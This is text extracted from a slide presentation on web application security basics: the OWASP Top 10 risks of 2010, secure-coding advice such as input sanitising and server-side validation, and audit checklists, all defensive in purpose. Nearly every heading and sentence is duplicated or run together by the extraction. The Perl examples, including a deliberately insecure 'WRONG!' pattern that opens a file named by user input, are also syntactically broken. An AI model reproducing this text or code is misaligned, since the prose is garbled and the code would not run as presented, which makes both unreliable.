PHPPHP ASP.NETASP.NET JSP JSP PerlPerl

Apache Microsoft IIS

Internet Explorer Netscape

Hackers

OWASP

AgendaAgendaUnderstanding the Web

ApplicationsOWASP Top 10 VulnerabilitiesWriting Secure Web

ApplicationsAuditing Web ApplicationsQuestion and Answers

What is aWhat is a Web Web Application?Application?

It is an application that is accessed via a web browser It is an application that is accessed via a web browser over a network (Internet or an intranet).over a network (Internet or an intranet).

An application, generally comprised of a collection of An application, generally comprised of a collection of scripts, that reside on a Web server and interact with scripts, that reside on a Web server and interact with

databases or other sources of dynamic content.databases or other sources of dynamic content.

AnyAny Examples?Examples?Some examples of Web Applications include Search Some examples of Web Applications include Search Engines, Webmail, Shopping carts (Engines, Webmail, Shopping carts (Amazon, e-bayAmazon, e-bay) and ) and

Portal Systems (Portal Systems (iGoogle, YahooiGoogle, Yahoo))..

Some examples ofSome examples of Web Web ApplicationsApplications

What is the key reason for theirWhat is the key reason for their popularity?popularity?

The ability to update and maintain web applications The ability to update and maintain web applications without without distributing and installing softwaredistributing and installing software on potentially thousands of on potentially thousands of client computers.client computers.

Require Require little or no disk space on the clientlittle or no disk space on the client, upgrade , upgrade automatically with new features, integrate easily into other automatically with new features, integrate easily into other server-side web procedures, such as e-mail and searching, server-side web procedures, such as e-mail and searching, does does not requirenot require anyany additionaladditional hardware or software configuration for hardware or software configuration for its working. its working.

Its inherent support for Its inherent support for cross-platform compatibilitycross-platform compatibility..

The web applications include such The web applications include such simple taskssimple tasks as filling a form as filling a form for certain facility (Net Banking to give orders) or for certain facility (Net Banking to give orders) or working on working on major projectsmajor projects..

Web applications are easy to use and are Web applications are easy to use and are more presentablemore presentable and and attractiveattractive than the traditional softwares. than the traditional softwares.

What’s theWhat’s the Business Use? Business Use?

An emerging strategy for Application Software companies is An emerging strategy for Application Software companies is to provide to provide web accessweb access to software previously distributed as to software previously distributed as local applications. local applications.

These programs allow the user to pay a monthly or yearly These programs allow the user to pay a monthly or yearly feefee for use of a software application without having to for use of a software application without having to install it on a local hard drive. install it on a local hard drive.

A company which follows this strategy is known as an A company which follows this strategy is known as an application service provider (application service provider (ASPASP), and ASPs are currently ), and ASPs are currently receiving much attention in the software industry.receiving much attention in the software industry.

How theHow the above ones above ones contribute contribute to Web to Web

Applications?Applications?

Web Programming Language :

The The Web places Web places some specific some specific constraints on our choicesconstraints on our choices: the ability to deal : the ability to deal with a variety of protocols and formats (e.g. graphics) and programming with a variety of protocols and formats (e.g. graphics) and programming tasks; performance (speed and size); platform independence; and the basic tasks; performance (speed and size); platform independence; and the basic ability to deal with other Web tools and languages.ability to deal with other Web tools and languages.

PHP, PHP, ASP.NETASP.NET, JSP (Java Server Pages), Perl and , JSP (Java Server Pages), Perl and Cold FusionCold Fusion, which fall into , which fall into two main groups – proprietary and open-source.two main groups – proprietary and open-source.

Above mentioned ones are open-source except the proprietary Above mentioned ones are open-source except the proprietary Cold Fusion Cold Fusion and and ASP.NETASP.NET..

Web Server Software : :

Is a computer program that delivers content, such as Is a computer program that delivers content, such as Web Web pagespages, using the Hypertext Transfer Protocol (HTTP), over the , using the Hypertext Transfer Protocol (HTTP), over the World Wide Web.World Wide Web.

Features: Features: Virtual hostingVirtual hosting to serve many Web sites using one IP address. to serve many Web sites using one IP address. Large file supportLarge file support to be able to serve files whose size is to be able to serve files whose size is

greater than 2 GB on 32 bit OS. greater than 2 GB on 32 bit OS. Bandwidth throttlingBandwidth throttling to limit the speed of responses (not to to limit the speed of responses (not to

saturate) and to be able to serve more clients. saturate) and to be able to serve more clients. Server-side scriptingServer-side scripting to generate dynamic Web pages. to generate dynamic Web pages.

Some examples include – Apache Tomcat, Microsoft IIS etc,.Some examples include – Apache Tomcat, Microsoft IIS etc,.

Web Browser ::

A software applicationA software application for retrieving, presenting, and for retrieving, presenting, and traversing informationtraversing information resources on the World Wide Web. resources on the World Wide Web.

Hyperlinks enable users to Hyperlinks enable users to easily navigateeasily navigate their browsers their browsers to related resources.to related resources.

All major web browsers allow the user to All major web browsers allow the user to open multiple open multiple information resources at the same timeinformation resources at the same time, either in different , either in different browser windows or in different tabs of the same window. browser windows or in different tabs of the same window. They includeThey include pop-up blockers pop-up blockers to prevent unwanted to prevent unwanted windows from "popping up" without the user's consent.windows from "popping up" without the user's consent.

Some popular browsers are – Internet Explorer, Mozilla Some popular browsers are – Internet Explorer, Mozilla Firefox, Netscape Navigator , Safari, Opera etc.,Firefox, Netscape Navigator , Safari, Opera etc.,

Open Web Application Security Project Open Web Application Security Project

((OWASPOWASP))

OWASP community includes corporations, educational organizations, and individuals from around the world.

OWASP is an open-source application security project.

All of the OWASP tools, documents, forums, and chapters are free and open to anyone interested in improving application security .

OWASP is not affiliated with any technology company (free from commercial pressures), and it provides unbiased, practical, cost-effective information about application security.

OWASP Top 10 Application Security OWASP Top 10 Application Security Risks –2010Risks –2010

A1 – InjectionA1 – Injection - - Occurs when untrusted Occurs when untrusted data is sent to an interpreter as part of a data is sent to an interpreter as part of a command or query. command or query.

A2 – Cross Site Scripting (XSS)A2 – Cross Site Scripting (XSS) - - AAllows attackers to execute script in the llows attackers to execute script in the victim’s browser which can hijack user victim’s browser which can hijack user sessions, deface web sites, or redirect the sessions, deface web sites, or redirect the user to malicious sites.user to malicious sites.

A3 – Broken Authentication and A3 – Broken Authentication and Session ManagementSession Management - - occur when occur when developers fail to protect their users developers fail to protect their users sensitive information such as user names, sensitive information such as user names, passwords, and session tokenspasswords, and session tokens ..

A4 – Insecure Direct Object A4 – Insecure Direct Object ReferencesReferences - - Occurs when a developer Occurs when a developer exposes a reference to an internal exposes a reference to an internal implementation object (file, directory, or implementation object (file, directory, or database key).database key).

A5 – Cross Site Request Forgery A5 – Cross Site Request Forgery (CSRF)(CSRF) - - Forces a logged-on Forces a logged-on victim’s browser to send a forged victim’s browser to send a forged HTTP request, including the victim’s HTTP request, including the victim’s session cookie and any other session cookie and any other authentication information, to a authentication information, to a vulnerable web application.vulnerable web application.

A6 – Security MisconfigurationA6 – Security Misconfiguration - - Security depends on having a secure Security depends on having a secure configuration defined for the configuration defined for the application, framework, web server, application, framework, web server, application server, and platform. application server, and platform.

A7 - Failure to Restrict URL A7 - Failure to Restrict URL AccessAccess - - Many web applications Many web applications check URL access rights before check URL access rights before rendering protected links and buttons. rendering protected links and buttons. Attackers will be able to forge URLs to Attackers will be able to forge URLs to access the hidden pages anyway.access the hidden pages anyway.

A8 – Unvalidated Redirects and A8 – Unvalidated Redirects and ForwardsForwards - - Web applications Web applications frequently redirect and forward users frequently redirect and forward users to other pages and websites, and use to other pages and websites, and use untrusted data to determine the untrusted data to determine the destination pages. destination pages.

A9 – Insecure Cryptographic A9 – Insecure Cryptographic StorageStorage - - Many web application do Many web application do not properly protect sensitive data, not properly protect sensitive data, such as credit cards, SSNs, and such as credit cards, SSNs, and authentication credentials, with authentication credentials, with appropriate encryption or hashing.appropriate encryption or hashing.

A10 - Insufficient Transport Layer A10 - Insufficient Transport Layer ProtectionProtection - - Applications frequently Applications frequently fail to encrypt network traffic when it is fail to encrypt network traffic when it is necessary to protect sensitive necessary to protect sensitive communications. communications.

The threat landscape for Internet applications change with advances The threat landscape for Internet applications change with advances by attackers, new technology, and increasingly complex systems. To by attackers, new technology, and increasingly complex systems. To keep pace, OWASP updates the Top 10 periodically.keep pace, OWASP updates the Top 10 periodically.

They have changed OWASP’s ranking methodology to estimate risk, They have changed OWASP’s ranking methodology to estimate risk, instead of relying solely on the frequency of the associated weakness.instead of relying solely on the frequency of the associated weakness.

OWASP Top 10 Risk Rating MethodologyOWASP Top 10 Risk Rating Methodology Attack VectorAttack Vector - How hard for an attacker to use this flaw - How hard for an attacker to use this flaw Weakness PrevalenceWeakness Prevalence – How often is it found – How often is it found Weakness Detectability-Weakness Detectability- How hard is it for an attacker to find the flaw How hard is it for an attacker to find the flaw Technical ImpactTechnical Impact This is generic across the internet, not specific to any organization.This is generic across the internet, not specific to any organization.

Threat

Agent

Attack Vector

Weakness Prevalence

Weakness Detectabili

ty

Technical Impact

Business Impact

?Easy Widespread Easy Severe

?Average Common Average Moderate

Difficult Uncommon Difficult Minor

Cenzic Web Application Security Trends Report Reveals Cenzic Web Application Security Trends Report Reveals 90%90% of Web Applications Vulnerable, of Web Applications Vulnerable,

Adobe One of the Most Vulnerable.Adobe One of the Most Vulnerable.

Source: Cenzic Web Application Security Trends Report

What are the root causes of What are the root causes of Application vulnerabilities?Application vulnerabilities?

Every application security problem has a root cause Every application security problem has a root cause somewhere in the organization.somewhere in the organization.

It may be that the project didn't have the right It may be that the project didn't have the right activities in their development process, or it may be activities in their development process, or it may be that the developers didn't have the right training, or that the developers didn't have the right training, or it might even be that the team didn't have the right it might even be that the team didn't have the right

tools for the job. tools for the job.

Writing Writing Secure Web ApplicationsSecure Web Applications

Sanitize browser inputSanitize browser input Two dangers with browser input data Two dangers with browser input data

Input containing special characters such as Input containing special characters such as ! ! and and && could cause the web server to execute an OS could cause the web server to execute an OS command or have other unexpected behavior. command or have other unexpected behavior.

User input stored on the server could contain User input stored on the server could contain malicious HTML tags and scripts. When another malicious HTML tags and scripts. When another user views the input, that user's web browser could user views the input, that user's web browser could execute the HTML and scripts.execute the HTML and scripts.

“The best practice is to strip unwanted characters, invisible characters and HTML tags from user input”

Don’t put everything in the HTML directoryDon’t put everything in the HTML directory

For example, if your Web Application places a data file named For example, if your Web Application places a data file named ““card_number.datcard_number.dat” in ” in /public_html/public_html, any outsider who guesses the , any outsider who guesses the file name can view its contents in their browserfile name can view its contents in their browser..

“You have separate locations for HTML files, executable programs, shared library code and data. Separating the data files into sub-directories by application helps eliminate file

naming problems”

Hidden fields aren’tHidden fields aren’t Many programs rely on so-called "hidden" form fields to Many programs rely on so-called "hidden" form fields to

store state information, settings and previous input data. store state information, settings and previous input data.

HTML "hidden" fields are not hidden and not secure. Users HTML "hidden" fields are not hidden and not secure. Users can see them by viewing the HTML source of your form in can see them by viewing the HTML source of your form in their browser.their browser.

Contents of hidden fields should be sanitized and validated just like any other user input field. Hidden fields should not be used to set access modes or privileges for a program.

Use POST instead of GETUse POST instead of GET HTML forms can be submitted using either GET or HTML forms can be submitted using either GET or

POST methods. POST methods.

The GET method sends all form input to the web The GET method sends all form input to the web application as part of the URL. application as part of the URL.

“POST is preferred, especially when sending sensitive information”

Validate on the ServerValidate on the Server It's easy for a knowledgeable user to save an HTML form, It's easy for a knowledgeable user to save an HTML form,

disable the embedded Java script, then use the modified disable the embedded Java script, then use the modified form to submit bad data back to the web application. form to submit bad data back to the web application.

When the application expects all input validation to have When the application expects all input validation to have already been done by the web browser, and therefore already been done by the web browser, and therefore doesn't double check the input, your Web Application can doesn't double check the input, your Web Application can be compromisedbe compromised ..

“Client-side validation should never be trusted as a replacement for additional server-side validation.”

Avoid real directory or file namesAvoid real directory or file names

“Never use actual directory or file names as parameters or construct names based on user input. Instead, use keywords that are pointers and store the actual file or directory names in a lookup table”.

For example, in a Perl program do NOT do this:

WRONG!> $datafile = param('datafilename');WRONG!> $open DATAFILE $datafile or die;

Instead, do something like this:BETTER> my %filelist = ( "name" => "/home/data/name.txt";BETTER> "address" => "/home/data/address.txt" );BETTER> $keyword = param('datafilename');BETTER> open DATAFILE $filelist($keyword) or die;

Specify the OPEN mode when opening a Specify the OPEN mode when opening a filefile

When opening a file for reading only specify that it should When opening a file for reading only specify that it should be opened read-only. be opened read-only.

Most programming languages allow modes to be specified Most programming languages allow modes to be specified when opening files: read-only, write, append, read/write etcwhen opening files: read-only, write, append, read/write etc

“Always explicitly specify the mode, especially if a file should only be opened read-only. Do not rely on the default mode of the programming language… the default may change in future versions”

Log suspicious errorsLog suspicious errors

“All applications should be written to trap errors.”

Web applications are frequently attacked by crackers. It's a good idea to not only trap and recover from errors, but also to log events that may indicate an attack.

AuditingAuditing Web Web ApplicationsApplications

Verify all INPUT is validated prior to use by Verify all INPUT is validated prior to use by Web ServerWeb Server

Discuss with Web Admin the methodology used for input validation for the Application.

Use filtering criteria such as data type, allowed character set, min & max length, whether null is allowed, whether parameter allowed or not, numeric range, special legal values, specific patterns (expressions) etc.,

Verify proper Authorization Controls are Verify proper Authorization Controls are enforcedenforced

Failure to have a Policy or written Doc for a home-grown application is a red flag that suggests that access controls are not being enforced correctly.

Typical methods for bypassing given authorization include – Cached Ids; File permissions; Client Side Caching (PII).

Broken Authentication and Session Broken Authentication and Session ManagementManagement

Account credentials and session tokens must be protected. Discuss with Admin the authentication mechanism used to

authenticate users to the Web Application. Web Application should have a built-in facility to handle the

life cycle of user accounts. Verify that Helpdesk functionality (as lost passwords) is

handled securely. Guiding principles by OWASP.

Verify that the server is updated with all known Verify that the server is updated with all known patches for buffer overflowspatches for buffer overflows

Discuss this with Web Admin to ensure that any applicable patches have been installed.

In certain cases, commercial web applications require their own patches separate from the web platform.

Review the website for Cross-Site-Scripting Review the website for Cross-Site-Scripting (XSS) vulnerabilities(XSS) vulnerabilities

Best method is to do a thorough code review with the Admin. Validate every header, cookie, query string, form field and hidden

field. Tools like Nikto and Nessus can find well known attacks, but they are

not as good as performing a solid code review. Consider hiring third-party help if you require resources.

Ensure Web Application is protected against Ensure Web Application is protected against Injection attacksInjection attacks

Validate all input using positive validation methods (what input should be).

Perform code review if possible for all calls to external resources to determine if the method could be compromised.

Commercial tools help finding well-known attacks, but not as good as code review.

Consider hiring 3rd party help if application is particularly sensitive.

Evaluate the use of proper error Evaluate the use of proper error handling.handling.

Discuss with Admin how error handling is designed into the Web App. Error handling is often better controlled if it is centralized as opposed

to compartmentalizing across several interworking objects/components.

If you are reviewing the code, the error handling should flow nicely and show structure.

Ensure that secure storage mechanisms are used Ensure that secure storage mechanisms are used correctly and appropriately.correctly and appropriately.

If data are sensitive and not encrypted, consider whether there are industry / regulatory drivers stating that the data must be encrypted & note the issue.

If encrypted, understand how the encryption mechanism was implemented.

Ensure that the level of encryption is equivalent to the level of data you want to protect (for extremely sensitive data – have actual encryption instead of a simple algorithm that obfuscates the data).

Determine the use of adequate controls to prevent Determine the use of adequate controls to prevent DOS.DOS.

Authenticated users would have more resources and visiting users would be limited in scope as to what they can access.

Resource-intensive operations in some cases may be offloaded, such as DB queries.

Make sure that your Hardware and Memory are sufficient for the Web Application.

You can use open-source stress-testing tools.

Discuss the following with Admin to ensure proper configuration management controls are in place:– Security mailing lists for web server, platform, and

application are monitored.– Latest security patches are applied.– VA Scan from both internal and external perspectives is

conducted.– A security configuration guideline exists for the web

servers and is strictly followed.– Regular internal reviews of the server’s security

configuration are conducted.– Regular status reports are issued to upper management

documenting overall security posture of the web servers.

Review controls surrounding maintaining a Review controls surrounding maintaining a secure configurationsecure configuration

Some Web Application Testing ToolsSome Web Application Testing Tools

iMacros - tool from iOpus.com (free trial)

Burp Suite - an integrated platform for attacking web applications.

AppScan - from IBM offers static and dynamic security testing in all stages of application development. (trial download)

HP WebInspect - web application security testing for complex web applications. (15 days evaluation)

A presentation onA presentation on

Basics of Web Application Basics of Web Application Vulnerabilities - Best PracticesVulnerabilities - Best Practices

By By Kishore Kumar M , M.Sc(IS), CISA, E-MBA, CSMKishore Kumar M , M.Sc(IS), CISA, E-MBA, CSM

References: References: www.owasp.orgwww.owasp.org http://advosys.ca/papers/web/61-web-security.htmlhttp://advosys.ca/papers/web/61-web-security.html ‘‘IT AUDITING Using Controls To Protect Information Assets’IT AUDITING Using Controls To Protect Information Assets’ – – By By

Chris Davis, Mike Schiller, and Kevin WheelerChris Davis, Mike Schiller, and Kevin Wheeler

Thank YouThank You